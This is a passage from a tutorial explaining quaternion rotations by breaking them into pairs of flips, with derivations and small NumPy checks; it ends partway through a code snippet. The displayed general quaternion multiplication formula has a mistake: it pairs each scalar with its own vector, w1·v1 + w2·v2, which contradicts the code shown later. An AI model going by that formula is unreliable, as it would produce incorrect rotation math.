But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use quaternion to describe this angle-axis rotation : stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be thinking why we are using stem:[\\frac{\u03b8}{2}] other than using stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector that stem:[\\left|\\vec{v}\\right|=1]). We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion term:\n\n*_Any 3D rotation is equivalent a unit quaternion stem:[q] that stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go a little be more in details in math term: \n(1). For any 3D rotation equivalent to a rotation angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\n=== Rotation and Flip\n\nNow let\u2019s forget quaternion for a minute, and focus on the nature of rotations. This part is the key to understand quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips, is that flips are much easier to think and calculate than general 3D rotation. We will start from flip and build our way to understand rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], both of them are on XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}] , which is the same as flip stem:[\\vec{v}] along axis stem:[\\vec{a}] and get stem:[\\vec{v'}], and then flip stem:[\\vec{v'}] along axis stem:[\\vec{b}] and get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. 
If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of angle is important, as you can easily see flip along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}] ? It turns out to be very straight forward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on XY plane but on a plane cross the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to rotating angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flip, which is easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down to flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion term \n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternion to represent flip. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternion. Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)] then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_1} + w_2\\vec{v_2} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternion, so even I\u2019m using vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interesting to know how this is derived, quaternion https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straight forward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. 
Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)], then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will only be using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be wondering why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign come from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. Let stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], and also that stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nThis shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example, if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}]; rotating stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotating stem:[270^{\\circ}] in the opposite direction along the same axis stem:[\\vec{v}]. \n\nThe fact that stem:[q] and stem:[\u2013q] represent the same rotation is usually called double cover. However, in our calculations I don\u2019t want you to simply treat stem:[q] and stem:[\u2013q] as the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right-hand side is important. It means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}].
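\n\nTo make the rule concrete, here is a small numerical check of the flip composition (a minimal sketch, assuming NumPy is available; the helper name `flip_mul` is our own). It rebuilds the stem:[+90^{\\circ}] rotation along stem:[\\vec{Z}] from Figure 1 and verifies stem:[q=-{q_b}{q_a}]:\n\n[source,python]\n----\nimport numpy as np\n\n# Flip product: (a, 0)(b, 0) = (a x b, -a . b), stored as [x, y, z, w].\ndef flip_mul(qa, qb):\n    return np.append(np.cross(qa[:3], qb[:3]), -np.dot(qa[:3], qb[:3]))\n\ntheta = np.radians(90.0)\nhalf = 0.5 * theta\nv = np.array([0.0, 0.0, 1.0])                    # rotation axis Z\nq = np.append(np.sin(half) * v, np.cos(half))    # q = (sin(half) v, cos(half))\n\na = np.array([1.0, 0.0, 0.0])                    # any axis in the XY plane\nb = np.array([np.cos(half), np.sin(half), 0.0])  # a rotated by half the angle\n\nqa = np.append(a, 0.0)\nqb = np.append(b, 0.0)\nprint(np.allclose(q, -flip_mul(qb, qa)))         # True\n----\nSwapping the two factors, or dropping the minus sign, makes the check fail, which matches the discussion above.\n\n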
Actually, all unit quaternion multiplications need to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can, however, get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and a vector stem:[\\vec{v}], we are ready to calculate the result of the flip, stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to the definition of a flip, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axes of flips stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)], then from our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the resulting rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the resulting rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{u},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}]. If you are not sure what\u2019s going on here, go back to \u201cFlip Composition\u201d and read the proof.)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called the identity quaternion, meaning no rotation at all. You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see that for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternions, the idea of the inverse quaternion is that if you apply a rotation and then apply its inverse, the result should be no rotation at all. The same holds if you apply the inverse rotation first and then the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], the inverse is stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. 
You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of flips. You can try extending this proof to general unit quaternions. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can now go back to the previous result of flipping a vector, stem:[{q_v'}{q_a}={q_a}{q_v}]. Applying the inverse flip of stem:[q_a] on both sides, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us with a way to calculate the result of a flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in a quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is where the \u201csandwich\u201d multiplication form comes from, though so far only in the form of a flip. We will prove that this result holds for any rotation in the next section.\n\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip to stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we still need to prove:\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we have fully explained how to rotate a vector using a quaternion.\n\n=== Rotation Composition\n\nGiven rotations stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate a vector stem:[\\vec{v}] by stem:[q_1] first and then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nThis is the same as applying the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later. This equation is actually very easy to understand in geometric terms.
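\n\nBefore the geometric argument, both results can be sanity-checked numerically (again a minimal sketch assuming NumPy; `qmul` simply transcribes the general multiplication from \u201cFlip Composition\u201d, and for a unit quaternion the inverse just negates the vector part):\n\n[source,python]\n----\nimport numpy as np\n\n# General product: (v1, w1)(v2, w2) = (w1 v2 + w2 v1 + v1 x v2, w1 w2 - v1 . v2).\ndef qmul(q1, q2):\n    v1, w1 = q1[:3], q1[3]\n    v2, w2 = q2[:3], q2[3]\n    return np.append(w1 * v2 + w2 * v1 + np.cross(v1, v2),\n                     w1 * w2 - np.dot(v1, v2))\n\ndef qinv(q):                          # inverse of a unit quaternion\n    return np.append(-q[:3], q[3])\n\ndef axis_angle(axis, theta):          # q = (sin(half) axis, cos(half))\n    half = 0.5 * theta\n    return np.append(np.sin(half) * np.asarray(axis, dtype=float), np.cos(half))\n\ndef rotate(q, vec):                   # sandwich form, stuffing vec into a flip (vec, 0)\n    return qmul(qmul(q, np.append(vec, 0.0)), qinv(q))[:3]\n\nq1 = axis_angle([0, 0, 1], np.radians(90))    # +90 deg along Z\nq2 = axis_angle([1, 0, 0], np.radians(90))    # +90 deg along X\nv = np.array([1.0, 0.0, 0.0])\n\nprint(np.round(rotate(q1, v), 6))             # [0. 1. 0.]\nprint(np.allclose(rotate(qmul(q2, q1), v),    # combined rotation q2 q1 ...\n                  rotate(q2, rotate(q1, v)))) # ... equals applying q1 then q2: True\nprint(np.allclose(qinv(qmul(q2, q1)),         # the identity we still owe a proof for\n                  qmul(qinv(q1), qinv(q2))))  # True\n----\n\n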
We have a combined rotation stem:[q={q_2}{q_1}] that applies stem:[q_1] first and then stem:[q_2]. If we want to undo this rotation, which means applying the inverse stem:[q^{-1}=({q_2}{q_1})^{-1}], we need to undo stem:[q_2] first and then undo stem:[q_1]; that is effectively stem:[q_1^{-1}q_2^{-1}].\n\nWhat does it really mean to combine 2 rotations? Can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually can.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})]. We need to choose a special flip breakdown, such that the two rotations share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a breakdown? Remember that the rule of flip composition requires the flip axes to be perpendicular to the rotation axis, that is stem:[\\vec{c}\u00b7\\vec{v_1}=0] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], so we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find the other two axes: rotating stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] gives stem:[\\vec{a}]; rotating stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] gives stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our breakdown stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove:\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nThis shows that the combined rotation can be composed of flips stem:[q_a] and stem:[q_b], which tells us the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, the blue plane is spanned by stem:[\\vec{v_1}] and stem:[\\vec{v_2}]; stem:[\\vec{c}] is perpendicular to that plane. 
\nThe orange plane is spanned by stem:[\\vec{a}] and stem:[\\vec{b}]; the resulting rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of a quaternion stem:[q=(x,y,z,w)], the vector form of a quaternion stem:[q=(\\vec{v},w)], the unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], and how it is used to represent a rotation.\n\nWe also talked about the negation of a quaternion stem:[\u2013q] and its double-cover property; the inverse of a quaternion stem:[q^{-1}]; and the identity quaternion stem:[I=(\\vec{0},1)].\n\nWe used quaternions to represent flips stem:[q_a=(\\vec{a},0)], and derived the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how a quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotations are composed by stem:[q={q_2}{q_1}].\n\nWe briefly touched on quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not essential for understanding quaternions. It is a bit calculation-heavy and is more for fun. Feel free to skip it.\n\nWe can actually derive the general quaternion multiplication from this special flip breakdown. That is, if we define the flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can prove what the general quaternion multiplication stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})] must look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we chose the flip breakdown stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotating stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}], we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotating stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}], we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\n
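\nBefore grinding through the algebra, the shared-flip breakdown can be spot-checked numerically for arbitrary inputs (a minimal sketch assuming NumPy; `qmul` transcribes the general product from \u201cFlip Composition\u201d and `rodrigues` is our own helper for rotating a vector about a unit axis):\n\n[source,python]\n----\nimport numpy as np\n\ndef qmul(q1, q2):   # (v1, w1)(v2, w2) = (w1 v2 + w2 v1 + v1 x v2, w1 w2 - v1 . v2)\n    v1, w1 = q1[:3], q1[3]\n    v2, w2 = q2[:3], q2[3]\n    return np.append(w1 * v2 + w2 * v1 + np.cross(v1, v2),\n                     w1 * w2 - np.dot(v1, v2))\n\ndef rodrigues(vec, axis, theta):   # rotate vec about a unit axis by theta\n    k = np.asarray(axis, dtype=float)\n    return (vec * np.cos(theta) + np.cross(k, vec) * np.sin(theta)\n            + k * np.dot(k, vec) * (1 - np.cos(theta)))\n\nt1, t2 = np.radians(70.0), np.radians(40.0)    # arbitrary angles\nv1 = np.array([0.0, 0.0, 1.0])                 # arbitrary unit axes\nv2 = np.array([np.sin(0.5), 0.0, np.cos(0.5)])\n\nn 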